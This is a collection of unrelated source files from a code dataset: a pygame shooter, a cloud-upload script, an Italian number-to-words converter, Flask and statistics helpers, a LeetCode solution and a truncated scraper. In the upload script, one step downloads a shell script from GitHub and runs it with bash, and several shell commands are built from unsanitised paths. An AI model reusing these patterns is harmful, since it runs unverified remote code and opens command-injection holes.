self.ship_img.get_width()\n\n\tdef get_height(self):\n\t\treturn self.ship_img.get_height()\n\n\nclass Player(Ship):\n\tdef __init__(self, x, y, health=100):\n\t\tsuper().__init__(x, y, health)\n \n\t\tself.ship_img = YELLOW_SPACE_SHIP\n\t\tself.laser_img = YELLOW_LASER\n\t\tself.mask = pygame.mask.from_surface(self.ship_img)\n\t\tself.max_health = health\n\n\tdef draw(self, window):\n\t\tsuper().draw(window)\n\n\t\tself.health_bar(window)\n\n\tdef move_lasers(self, vel, objs):\n\t\tself.cooldown()\n\n\t\tfor laser in self.lasers:\n\t\t\tlaser.move(vel)\n\n\t\t\tif laser.off_screen(HEIGHT): \n\t\t\t\tself.lasers.remove(laser)\n\n\t\t\telse:\n\t\t\t\tfor obj in objs:\n\t\t\t\t\tif laser.collision(obj):\n\t\t\t\t\t\tobjs.remove(obj)\n\n\t\t\t\t\t\tif laser in self.lasers:\n\t\t\t\t\t\t\tself.lasers.remove(laser)\n\n\t\t\t\t\t\tCHANNEL_1.play(BOOM_SOUND)\n\n\tdef health_bar(self, window):\n\t\tpygame.draw.rect(window, (255, 0, 0), (self.x, self.y + self.ship_img.get_height() + 10, self.ship_img.get_width(), 10))\n\t\tpygame.draw.rect(window, (0, 255, 0), (self.x, self.y + self.ship_img.get_height() + 10, self.ship_img.get_width() * (self.health / self.max_health), 10))\n\n\nclass Enemy(Ship):\n\tCOLOR_MAP = {\n\t\t'red': (RED_SPACE_SHIP, RED_LASER),\n\t\t'blue': (BLUE_SPACE_SHIP, BLUE_LASER),\n\t\t'green': (GREEN_SPACE_SHIP, GREEN_LASER),\n\t}\n\n\tdef __init__(self, x, y, color, health=100):\n\t\tsuper().__init__(x, y, health)\n\n\t\tself.ship_img, self.laser_img = self.COLOR_MAP[color]\n\t\tself.mask = pygame.mask.from_surface(self.ship_img)\n\n\tdef move(self, vel):\n\t\tself.y += vel\n\n\tdef shoot(self):\n\t\tif self.cool_down_counter == 0:\n\t\t\tlaser = Laser(self.x, self.y, self.laser_img)\n\t\t\tself.lasers.append(laser)\n\n\t\t\tself.cool_down_counter = 1\n\n\ndef collide(obj1, obj2):\n\toffset_x = obj2.x - obj1.x\n\toffset_y = obj2.y - obj1.y\n\n\treturn obj1.mask.overlap(obj2.mask, (offset_x, offset_y)) != None # (x, y)\n\n\ndef main():\n\trun = True\n\tFPS = 60\n\n\tlevel = 0\n\tlives = 5\n\n\tmain_font = pygame.font.SysFont('comicsans', 50)\n\tlost_font = pygame.font.SysFont('comicsans', 70)\n\n\tenemies = []\n\twave_lenght = 5 # Number on Enemies in Each Level ( will be Increased as Level Increases )\n\n\tenemy_vel = 1\n\tplayer_vel = 5\n\tlaser_vel = 7 # Speed of Lasers\n\n\tplayer = Player(300, 630)\n\n\tclock = pygame.time.Clock()\n\n\tlost = False\n\tlost_count = 0\n\n\t# Added by Me\n\tnew_wave_comming = True\n\tnew_wave_comming_count = 0\n\t# new_wave_blink = False\n\n\tdef redraw_window():\n\t\tWIN.blit(BG, (0, 0))\n\n\t\t# Draw Enemies\n\t\tfor enemy in enemies:\n\t\t\tenemy.draw(WIN)\n\n\t\t# Draw Ship\n\t\tplayer.draw(WIN)\n\n\t\t# Draw Text\n\t\tlives_label = main_font.render(f'Lives: {lives}', 1, (255, 255, 255))\n\t\tlevel_label = main_font.render(f'Level: {level}', 1, (255, 255, 255))\n\n\t\tWIN.blit(lives_label, (10, 10))\n\t\tWIN.blit(level_label, (WIDTH - level_label.get_width() - 10, 10))\n\n\t\t# Drawing Wave Label\n\t\tif new_wave_comming:\n\t\t\tnew_wave_label = main_font.render('New Wave Comming', 1, (255, 89, 0))\n\t\t\tWIN.blit(new_wave_label, (WIDTH / 2 - new_wave_label.get_width() / 2, 10))\n\n\t\t# Drawing Lost Label\n\t\tif lost:\n\t\t\tlost_label = lost_font.render('You Lost!', 1, (255, 0, 0))\n\t\t\tWIN.blit(lost_label, (WIDTH / 2 - lost_label.get_width() / 2, 350))\n\n\t\tpygame.display.update()\n\n\twhile run:\n\t\tclock.tick(FPS)\n\n\t\tif lives <= 0 or player.health <= 0:\n\t\t\tlost = True\n\n\t\tif lost:\n\t\t\tchannel_2_busy = 
pygame.mixer.Channel(2).get_busy()\n\t\t\tif channel_2_busy != True:\n\t\t\t\tCHANNEL_2.play(LOST_SOUND)\n\n\t\t\tif lost_count > FPS * 3:\n\t\t\t\trun = False\n\n\t\t\telse:\n\t\t\t\tlost_count += 1\n\t\t\t\tredraw_window()\n\n\t\t\t\tcontinue\n\n\n\t\tif new_wave_comming:\n\t\t\tif new_wave_comming_count > FPS * 3:\n\t\t\t\tnew_wave_comming = False\n\t\t\t\tnew_wave_comming_count = 0\n\n\t\t\telse:\n\t\t\t\tnew_wave_comming_count += 1\n\n\t\tif len(enemies) == 0:\n\t\t\tlevel += 1\n\t\t\twave_lenght += 2 # How much the Wave Would be Bigger when New Level Starts ( Original: 5 )\n\n\t\t\tnew_wave_comming = True\n\n\t\t\tfor i in range(wave_lenght):\n\t\t\t\tenemy = Enemy(random.randrange(50, WIDTH-100), random.randrange(-1500, -100), random.choice(['red', 'blue', 'green']))\n\t\t\t\tenemies.append(enemy)\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tsys.exit()\n\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_q:\n\t\t\t\t\tsys.exit()\n\n\t\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\t\trun = False\n\n\t\tkeys = pygame.key.get_pressed()\n\n\t\tif keys[pygame.K_a] and player.x - player_vel > 0: # Left\n\t\t\tplayer.x -= player_vel\n\n\t\tif keys[pygame.K_d] and player.x + player_vel + player.get_width() < HEIGHT: # Right\n\t\t\tplayer.x += player_vel\n\n\t\tif keys[pygame.K_w] and player.y - player_vel > 0: # Up\n\t\t\tplayer.y -= player_vel\n\n\t\tif keys[pygame.K_s] and player.y + player_vel + player.get_height() + 20 < HEIGHT: # Down\n\t\t\tplayer.y += player_vel\n\n\t\tif keys[pygame.K_SPACE]:\n\t\t\tplayer.shoot()\n\n\t\tfor enemy in enemies[:]:\n\t\t\tenemy.move(enemy_vel)\n\t\t\tenemy.move_lasers(laser_vel, player)\n\n\t\t\tif random.randrange(0, 2 * 60) == 1:\n\t\t\t\tenemy.shoot()\n\n\t\t\tif collide(enemy, player):\n\t\t\t\tplayer.health -= 20\n\t\t\t\tenemies.remove(enemy)\n\n\t\t\telif enemy.y + enemy.get_height() > HEIGHT:\n\t\t\t\tlives -= 1\n\t\t\t\tenemies.remove(enemy)\n\n\t\tplayer.move_lasers(-laser_vel, enemies)\n\n\t\tredraw_window()\n\n\ndef main_menu():\n\ttitle_font = pygame.font.SysFont('comicsans', 70)\n\n\trun = True\n\n\twhile run:\n\t\tWIN.blit(BG, (0, 0))\n\n\t\ttitle_label = title_font.render(\"Press Any Button to Begin ...\", 1, (255, 255, 255))\n\t\tWIN.blit(title_label, (WIDTH / 2 - title_label.get_width() / 2, 350))\n\n\t\tpygame.display.update()\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\trun = False\n\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_q or event.key == pygame.K_ESCAPE:\n\t\t\t\t\trun = False\n\n\t\t\t\telse:\n\t\t\t\t\tmain()\n\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tmain()\n\n\n\tpygame.quit()\n\n\nif __name__ == \"__main__\":\n\tmain_menu()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"83698048","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport requests\n\nclass Pcsdr:\n\n def __init__(self, local_dir=None, remote_dir=None):\n self.__local_dir = local_dir\n self.__remote_dir = remote_dir\n #\n self.__new_dirs = []\n #\n self.__new_files = []\n\n\n def get_dirs_and_files(self, local_dir=None):\n if local_dir:\n self.__local_dir = local_dir\n for root, dir, files in os.walk(self.__local_dir):\n self.__new_dirs.append(root)\n for filepath in files:\n self.__new_files.append(os.path.join(root, filepath))\n\n def check_pcs(self):\n 
pcs_exists = os.popen3('which pcs')[1].read()\n if not pcs_exists:\n pcs_addr = 'https://raw.githubusercontent.com/whatwewant/pScript/master/shell/config_pcs.sh'\n with open('/tmp/pcs.sh', 'wb') as f:\n f.write(requests.get(pcs_addr))\n os.system('bash /tmp/pcs.sh')\n\n def mkdir_in_bdwp(self):\n for dir in self.__new_dirs:\n dir = dir.replace(self.__local_dir, '', 1)\n # print self.__remote_dir\n #print dir\n #print os.path.join(self.__remote_dir, dir)\n remote_full_path = (self.__remote_dir + '/' + dir).replace('//', '/')\n if not os.popen3('pcs meta %s' % remote_full_path)[1].read():\n status = os.system('pcs mkdir %s' % remote_full_path)\n if not status:\n print('pcs mkdir %s succeeded.' % remote_full_path)\n else:\n print('pcs mkdir %s failed.' % remote_full_path)\n else:\n print('remote_dir %s already exists' % remote_full_path)\n\n def upload_files_to_bdwp(self):\n for absolte_path_file in self.__new_files:\n remote_full_path = self.__remote_dir + '/' + absolte_path_file.replace(self.__local_dir, '', 1)\n remote_full_path = remote_full_path.replace('//', '/')\n os.system('pcs upload '+ absolte_path_file + ' ' + remote_full_path)\n\n def run(self):\n self.check_pcs()\n self.get_dirs_and_files()\n self.mkdir_in_bdwp()\n self.upload_files_to_bdwp()\n\nif __name__ == '__main__':\n import sys\n\n if len(sys.argv) != 3:\n sys.stdout.write('Error Usage !!!\\n')\n sys.stdout.write('Usage:\\n')\n sys.stdout.write('\\t %s local_dir remote_dir\\n\\n' % sys.argv[0])\n sys.exit(-1)\n\n if not os.path.exists(sys.argv[1]):\n sys.stdout.write('Error: local_dir %s does not exist !!!\\n' % sys.argv[1])\n sys.stdout.write('Usage:\\n')\n sys.stdout.write('\\t %s local_dir remote_dir\\n\\n' % sys.argv[0])\n sys.exit(-1)\n\n if not sys.argv[2].startswith('/') or \\\n not os.popen3('pcs meta %s' % sys.argv[2])[1].read():\n sys.stdout.write('Error Usage: remote_dir %s does not exist !!!\\n' % sys.argv[2])\n sys.stdout.write('Usage:\\n')\n sys.stdout.write('\\t %s local_dir remote_dir\\n\\n' % sys.argv[0])\n sys.exit(-1)\n\n CreateObject = Pcsdr(sys.argv[1], sys.argv[2])\n CreateObject.run()\n\n\n","sub_path":"python/pcsdr.py","file_name":"pcsdr.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"529606376","text":"import logging\n\nch = logging.StreamHandler()\nformatter = logging.Formatter('%(name)s | %(message)s')\nch.setFormatter(formatter)\nlog = logging.getLogger(__name__)\nlog.addHandler(ch)\nlog.propagate = False\nlog.setLevel(logging.WARNING)\n\nlsunita=['','uno','due','tre','quattro','cinque','sei','sette','otto','nove']\nlsdecine=['','dieci','venti','trenta','quaranta','cinquanta','sessanta','settanta','ottanta','novanta']\nlsdieci=['dieci','undici','dodici','tredici','quattordici','quindici','sedici','diciassette','diciotto','diciannove']\n\ndef miliardi(n):\n m = n // 10**9\n s=''\n if m >= 10**2:\n s= centinaia(m)+decine(m)+unita(m)\n elif m >= 10:\n s= decine(m)+unita(m)\n elif m != 1:\n s= unita(m)\n else:\n return 'unmiliardo'\n return s+'miliardi'\n\ndef milioni(n):\n m = n // 10**6\n s=''\n if m >= 10**2:\n s= centinaia(m)+decine(m)+unita(m)\n elif m >= 10:\n s= decine(m)+unita(m)\n elif m != 1:\n s= unita(m)\n else:\n return 'unmilione'\n return s+'milioni'\n\ndef migliaia(n):\n m = n // 1000\n s=''\n if m >= 10**2:\n s= centinaia(m)+decine(m)+unita(m)\n elif m >= 10:\n s= decine(m)+unita(m)\n elif m != 1:\n s= unita(m)\n else:\n return 'mille'\n return s+'mila'\n\n\ndef centinaia(n):\n c = 
n % 1000 // 100\n d = n % 100 //10\n log.info('n: {0}, c: {1}, d: {2}'.format(n,c,d))\n s=''\n if c == 0:\n return s\n if c > 1:\n s=lsunita[c]+'cento'\n else:\n s='cento'\n if d == 8:\n return s[:-1]\n return s\n \ndef decine(n):\n if 10 <= (n % 100) <=19:\n return lsdieci[n%10]\n d = n % 100 // 10 # d sono le decine\n u = n % 10 # u sono le unita'\n log.info('n: {0}, d: {1}, u: {2}'.format(n,d,u))\n if u not in [1,8]:\n return lsdecine[d]\n else:\n return lsdecine[d][:-1]\n \ndef unita(n):\n if 10 <= (n % 100) <=19:\n return ''\n return lsunita[n % 10]\n \ndef conv(n):\n log.info('Conversione di n: {0}'.format(n))\n if n >= 10**9:\n return miliardi(n)+milioni(n)+migliaia(n)+centinaia(n)+decine(n)+unita(n)\n if n >= 10**6:\n return milioni(n)+migliaia(n)+centinaia(n)+decine(n)+unita(n)\n elif n >= 10**3:\n return migliaia(n)+centinaia(n)+decine(n)+unita(n)\n elif n >= 10**2:\n return centinaia(n)+decine(n)+unita(n)\n elif n >= 10:\n return decine(n)+unita(n)\n else:\n return unita(n)\n\n\nif __name__=='__main__':\n for i in [50011101,43332108,64355186,534471125,12331187,7528589,77298,51781,13000,71018]:\n print (conv(i))\n\n","sub_path":"students/AngeloSpognardi/homework01/program02.py","file_name":"program02.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"207910559","text":"from models.accord import AccordModel\nfrom util.logger import Logger\n\n\nclass AccordController():\n logger = Logger(__name__)\n @classmethod\n def make_accord(cls, data):\n if AccordModel.find_by_name(data['name']):\n return \"Accord with that name already exists. To edit, use PUT not POST\", 400, None\n\n try:\n new_accord = AccordModel(data['name'], data['category'], data['hexvalue'], data['scent_attribute'], data['alias'])\n new_accord.save_to_db()\n except:\n cls.logger.exception(\"Error in creating new accord\")\n return \"Internal Server Error.\", 500, None\n\n return \"\", 201, None\n\n @classmethod\n def edit_accord(cls, data):\n if not AccordModel.find_by_name(data['name']):\n return \"Accord with that name does not exists\", 400, None\n\n try:\n before_change = AccordModel.find_by_name(data['name'])\n before_change.category = data['category']\n before_change.hexvalue = data['hexvalue']\n before_change.scent_attribute = data['scent_attribute']\n before_change.save_to_db()\n except:\n cls.logger.exception(\"Error in editing exisitng accord\")\n return \"Internal System Error\", 500, None\n\n return \"\", 200, None\n\n @classmethod\n def delete_accord(cls, name):\n wanted = AccordModel.find_by_name(name)\n if not wanted:\n return \"Accord with that name doesn't exist\", 400, None\n\n try:\n wanted.delete_from_db()\n except:\n cls.logger.exception(\"Error deleting from db\")\n return \"Internal Server Error\", 500, None\n\n return \"\", 200, None\n\n @classmethod\n def get_all(cls):\n try:\n all_accords = AccordModel.get_all()\n except:\n cls.logger.exception(\"Error in getting all accords\")\n return \"Internal System Error\", 500, None\n return \"\", 200, all_accords\n\n @classmethod\n def get_accord(cls, name):\n try:\n target_accord = AccordModel.find_by_name(name)\n except:\n cls.logger.exception(\"Error in getting accord for given name\")\n return \"Internal System Error\", 500, None\n return \"\", 200, 
target_accord\n","sub_path":"controllers/accord.py","file_name":"accord.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"575605659","text":"#\n#Copyright (c) 2012-2021, NVIDIA CORPORATION.\n#SPDX-License-Identifier: Apache-2.0\n\n_version = (0, 3, 9)\nversion = '.'.join(map(str, _version))\n\n# Constant names (which happen to need to match methods called\n# handle_ in worker.py)\nCREATE_OBJECT = 'upload_object'\nREAD_OBJECT = 'get_object'\nUPDATE_OBJECT = 'update_object'\nDELETE_OBJECT = 'delete_object'\n","sub_path":"ssbench/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483273606","text":"import sys, getopt\nimport feature_extraction\nimport dir_config\nimport train_svm\nimport train_rforest\n\ndef main(argv):\n features = ''\n classifier = ''\n path = ''\n\n try:\n opts, args = getopt.getopt(argv,\"hf:c:p:\",[\"features=\",\"classifier=\", \"path=\"])\n except getopt.GetoptError:\n print ('test.py -f -c -p ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print ('run.py -f -c -p ')\n sys.exit()\n elif opt in (\"-f\", \"--features\"):\n features = arg\n elif opt in (\"-c\", \"--classifier\"):\n classifier = arg\n elif opt in (\"-p\", \"--path\"):\n path = arg\n \n if classifier== '' or features == '':\n print(\"Specify both features and classifier.\\n\\nrun.py -f -c -p \")\n sys.exit()\n\n #configure directories\n if path == '':\n print(\"Empty path.\")\n sys.exit()\n else:\n dir_config.config(path)\n \n feature_extraction.dataset_split(path)\n\n print ('Features to use: ', features)\n print ('Classifier to use: ', classifier)\n\n if features == 'opensmile_mfcc':\n feature_extraction.feature_extraction(path, f_type=\"opensmile_mfcc\")\n components = 39\n frames = 998\n elif features == 'opensmile_chroma':\n feature_extraction.feature_extraction(path, f_type=\"opensmile_chroma\")\n components = 12\n frames = 993\n elif features == 'mfcc':\n feature_extraction.feature_extraction(path, f_type=\"mfcc\")\n components = 39\n frames = 431\n elif features == 'cqt':\n feature_extraction.feature_extraction(path, f_type=\"cqt\")\n components = 12\n frames = 431\n elif features == 'cens':\n feature_extraction.feature_extraction(path, f_type=\"cens\")\n components = 12\n frames = 431\n \n if classifier == 'svm':\n train_svm.cross_val(path, features, components, frames)\n elif classifier == 'forest':\n train_rforest.cross_val(path, features, components, frames)\n \n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"80799500","text":"from scipy import stats\n\nfrom permute.core import one_sample, two_sample\n\n\ndef get_exception(test_name):\n return Exception(f\"Can't run a {test_name}. Incorrect data. 
\" +\n \"Only binary classification supported atm\")\n\n\ndef check_paired_sample_format(data):\n return len(data) == 2 and all(len(x) == 2 for x in data[0]) and \\\n all(len(x) == 2 for x in data[1])\n\n\ndef paired_ttest(confs):\n # run paired sample t-test only on binary prediction models\n if not check_paired_sample_format(confs):\n raise get_exception(\"paired sample t-test\")\n\n scores1 = [x[1] for x in confs[0]]\n scores2 = [x[1] for x in confs[1]]\n _, pval1 = stats.shapiro(scores1)\n _, pval2 = stats.shapiro(scores2)\n\n if pval1 < 0.05 or pval2 < 0.05:\n info =\\\n \"WARNING: Assumptions are likely violated. Data is unlikely to \" +\\\n \"be normally distributed.\"\n info += f\"\\nP-values from Shapiro-Wilk: {pval1:.4f}, {pval2:.4f}\"\n else:\n info =\\\n \"Assumptions are likely to hold. Data is likely to \" +\\\n \"be normally distributed.\"\n info += f\"\\nP-values from Shapiro-Wilk: {pval1:.4f}, {pval2:.4f}\"\n\n stat, pval = stats.ttest_rel(scores1, scores2)\n return stat, pval, info\n\n\ndef wilcoxon(confs):\n if not check_paired_sample_format(confs):\n raise get_exception(\"wilcoxon test\")\n\n scores1 = [x[1] for x in confs[0]]\n scores2 = [x[1] for x in confs[1]]\n diffs = [x1 - x2 for x1, x2 in zip(scores1, scores2)]\n stat, pval = stats.wilcoxon(diffs)\n info = \"\"\n return stat, pval, info\n\n\ndef permutation_one_sample(confs, stat='t'):\n if not check_paired_sample_format(confs):\n raise get_exception(\"paired permutation test\")\n\n scores1 = [x[1] for x in confs[0]]\n scores2 = [x[1] for x in confs[1]]\n\n # print(scores1[:20])\n # print(scores2[:20])\n\n pval, diff_means = one_sample(\n scores1, scores2, stat=\"mean\", alternative='two-sided')\n info = \"\"\n return diff_means, pval, info\n\n\ndef permutation_two_sample(confs, stat='t'):\n if not check_paired_sample_format(confs):\n raise get_exception(\"paired permutation test\")\n\n scores1 = [x[1] for x in confs[0]]\n scores2 = [x[1] for x in confs[1]]\n\n # print(scores1[:20])\n # print(scores2[:20])\n\n pval, diff_means = two_sample(\n scores1, scores2, stat=\"mean\", alternative='two-sided')\n info = \"\"\n return diff_means, pval, info\n","sub_path":"checklist_fork/checklist/tests/sig_functions.py","file_name":"sig_functions.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"250259362","text":"from shape_write import *\n\n\ndef container_write_round(cont, stream):\n cur = cont.nsp.next\n stream.write('Контейнер содержит {} элементов.\\n'.format(cont.nsp.value))\n if cur is not None:\n stream.write('Из них только круги:\\n')\n for i in range(cont.nsp.value):\n if cur.value.key == 1:\n stream.write('{}. {}.\\n'.format(i+1, shape_write(cur.value)))\n else:\n stream.write('{}. 
\\n'.format(i+1))\n cur = cur.next\n if cur.next.prev == cont.nsp.next:\n break","sub_path":"lab6_2/pp/container_write_round.py","file_name":"container_write_round.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"615325057","text":"from flask.ext.mysql import MySQL\nfrom config import mysql\nfrom itsdangerous import URLSafeTimedSerializer\nfrom flask import current_app as app\n\ndef getAnnouncements():\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getAnnouncements');\n\t\tdata=cursor.fetchall();\n\n\t\treturn data;\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getName(username):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getProfileUsername', (username,));\n\t\tdata=cursor.fetchall();\n\n\t\treturn data[0][1];\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getRAName(username):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getRAName', (username,));\n\t\tdata=cursor.fetchall();\n\n\t\treturn data[0][0];\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getDMName(username):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getDMName', (username,));\n\t\tdata=cursor.fetchall();\n\n\t\treturn data[0][0];\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getkrhid(username):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getProfileUsername', (username,));\n\t\tdata=cursor.fetchall();\n\n\t\treturn data[0][4];\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getYear():\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor=con.cursor();\n\t\tcursor.callproc('sp_getYear');\n\t\tdata=cursor.fetchall();\n\n\t\treturn data[0][1];\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getPermits(krhid, permitType):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor=con.cursor();\n\t\tcursor.callproc('sp_getPermits', (krhid, permitType,));\n\t\tdata=cursor.fetchall();\n\n\t\treturn data;\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getPIS(krhid, mode):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getPIS', (krhid,));\n\t\tdata = cursor.fetchall();\n\n\t\tif mode is 1:\n\t\t\toutput = [data[0][4], data[0][5], data[0][6], data[0][7]];\n\t\telif mode is 2:\n\t\t\toutput = [data[0][8], data[0][9]];\n\t\telif mode is 3:\n\t\t\toutput = [data[0][10], data[0][11]];\n\t\telif mode is 4:\n\t\t\toutput = [data[0][12]];\n\t\telif mode is 5:\n\t\t\toutput = data[0];\n\n\t\treturn output;\n\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close;\n\ndef generateToken(email):\n\tserializer = URLSafeTimedSerializer(app.config['SECRET_KEY']);\n\treturn serializer.dumps(email, salt=app.config['SECURITY_PASSWORD_SALT']);\n\ndef confirmToken(token, expiration=3600):\n\tserializer = URLSafeTimedSerializer(app.config['SECRET_KEY']);\n\ttry:\n\t\temail = 
serializer.loads(\n\t\t\ttoken,\n\t\t\tsalt=app.config['SECURITY_PASSWORD_SALT'],\n\t\t\tmax_age=expiration\n\t\t)\n\texcept:\n\t\treturn False\n\treturn email\n","sub_path":"app/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"440457544","text":"# On a horizontal number line, we have gas stations at positions stations[0], stations[1], ..., \n# stations[N-1], where N = stations.length.\n\n# Now, we add K more gas stations so that D, the maximum distance between adjacent gas stations, is minimized.\n\n# Return the smallest possible value of D.\n\n# Example:\n\n# Input: stations = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], K = 9\n# Output: 0.500000\n# Note:\n\n# stations.length will be an integer in range [10, 2000].\n# stations[i] will be an integer in range [0, 10^8].\n# K will be an integer in range [1, 10^6].\n# Answers within 10^-6 of the true value will be accepted as correct.\n\n\n\n\n# Approach #3: Heap [Time Limit Exceeded]\n# Intuition\n\n# Following the intuition of Approach #2, if we are taking a repeated maximum, \n# we can replace this with a heap data structure, which performs repeated maximum more efficiently.\n\n# Algorithm\n\n# As in Approach #2, let's repeatedly add a gas station to the next larget interval K times. \n# We use a heap to know which interval is largest. In Python, we use a negative priority to simulate a max heap with a min heap.\n\nclass Solution(object):\n def minmaxGasDist(self, stations, K):\n pq = [] #(-part_length, original_length, num_parts)\n for i in xrange(len(stations) - 1):\n x, y = stations[i], stations[i+1]\n pq.append((x-y, y-x, 1))\n heapq.heapify(pq)\n\n for _ in xrange(K):\n negnext, orig, parts = heapq.heappop(pq)\n parts += 1\n heapq.heappush(pq, (-(orig / float(parts)), orig, parts))\n\n return -pq[0][0]\n \n# Complexity Analysis\n\n# Time Complexity: O(K \\log N)O(KlogN), where NN is the length of stations.\n\n# Space Complexity: O(N)O(N), the size of deltas and count.\n\n# Approach #4: Binary Search [Accepted]\n# Intuition\n\n# Let's ask possible(D): with K (or less) gas stations, can we make every adjacent distance between gas stations at most D? \n# This function is monotone, so we can apply a binary search to find D*.\n\n# Algorithm\n\n# More specifically, there exists some D* (the answer) for which possible(d) = False when d < D* \n# and possible(d) = True when d > D*. Binary searching a monotone function is a typical technique, \n# so let's focus on the function possible(D).\n\n# When we have some interval like X = stations[i+1] - stations[i], we'll need to use floor(X/D) \n# gas stations to ensure every subinterval has size less than D. This is independent of other intervals, \n# so in total we'll need to use \\sum_i \\lfloor \\frac{X_i}{D} \\rfloor gas stations. 
\n# If this is at most K, then it is possible to make every adjacent distance between gas stations at most D.\n\nclass Solution(object):\n def minmaxGasDist(self, stations, K):\n def possible(D):\n return sum(math.ceil((stations[i+1] - stations[i]) / D)-1\n for i in xrange(len(stations) - 1)) <= K\n\n lo, hi = 0, 10**8\n while hi-lo > 1e-6:\n mi = (lo + hi) / 2.0\n if possible(mi):\n hi = mi\n else:\n lo = mi\n return lo\n \n# Complexity Analysis\n\n# Time Complexity: O(NlogW), where NN is the length of stations, and W = 10^{14}\n# is the range of possible answers (10^8), divided by the acceptable level of precision (10^{-6}).\n\n# Space Complexity: O(1) in additional space complexity.\n","sub_path":"LEETCODE/0774. Minimize Max Distance to Gas Station.py","file_name":"0774. Minimize Max Distance to Gas Station.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641850105","text":"# -*- coding: utf8 -*-\r\nimport pdb\r\nimport re\r\nimport os\r\nimport pickle\r\nimport html\r\nimport csv\r\n \r\nL=os.listdir('pagescollectees')\r\nBase=[['firme','sector']]\r\nfor k in L:\r\n with open('pagescollectees/'+k,'r',encoding='utf8') as output:\r\n content = output.read()\r\n content = html.unescape(content)\r\n pattern1 = '
(.+?(?=\t))'\r\n        firme = re.findall(pattern1,content)\r\n        \r\n        pattern2 = 'Secteur(.+?(?=))'\r\n        sector = re.findall(pattern2,content)\r\n        \r\n        if len(firme)==1 and len(sector)==1:\r\n            print(\"100% - Extraction réaliser avec succès\", firme, sector)\r\n        else:\r\n            if len(firme) !=1:\r\n                pattern1 ='class=\"float_lang_base_1 relativeAttr\"\\n\\tdir=\"ltr\" >(.+?(?=\\t))'\r\n                firme = re.findall(pattern1,content)\r\n            if len(sector) !=1:\r\n                pattern2 ='
